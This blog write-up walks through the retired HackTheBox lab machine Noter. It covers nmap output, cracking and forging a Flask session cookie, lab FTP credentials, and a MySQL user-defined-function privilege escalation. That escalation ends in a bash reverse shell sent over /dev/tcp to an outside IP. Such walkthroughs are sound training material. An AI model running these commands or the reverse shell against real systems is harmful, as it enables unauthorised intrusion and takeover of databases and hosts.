HackTheBox - Noter

Summary

Noter was a Medium difficulty Linux box created by kavigihan. Initial Foothold was finding a weak signing key used to sign the session we can modify the session and get ourself VIP access using that we get the ftp credentials and we find a pdf containing hint for ftp admin credential. Logging as ftp_admin we get access to app backup.In backup we find /export_note_local route which take an markdown and export that as pdf. Using the we can get command injection and get access to the box as svc we can get privilege escalation using module injection in mysql.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Nmap 7.92 scan initiated Sun May  8 04:06:01 2022 as: nmap -sC -sV -oN nmap/noter noter.htb
Nmap scan report for noter.htb (10.129.58.78)
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)
| 256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)
|_ 256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 8 04:10:20 2022 -- 1 IP address (1 host up) scanned in 259.89 seconds

Port 5000

Opening the page we see

Which look like an note taking application running on Werkzeug

Let’s Register to the website and see what happens

After Successful Register, Lets Login

On Dashboard We see two button

Add Note and Upgrade to VIP

Creating some notes we see

the endpoint /note/4/ Lets look for other?

Not finding anything I looked into trying to unsign the cookie to maybe find the secret

1
flask-unsign -u -c "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZjN2M3IifQ.Ynd81g.NGys3evMvZ-sFmG0a1JEg6KulBY" -w "/usr/share/wordlists/rockyou.txt" --no-literal-eval

and was able to find the secret as secret123

Enumerating for user on login screen based on error message we find an username as blue.

forging the cookie for that and trying it out we find

a note as

Logging into the ftp service we find the policy.pdf which show the password creation patern.

Logging as ftp_admin with password ftp_admin@Noter!

we find an app backup so downloading that

Shell

1
Nildogg36

1
2
3
4
5
6
7
8
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.68/1337 0>&1"');

Root Shell

https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/Noter/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.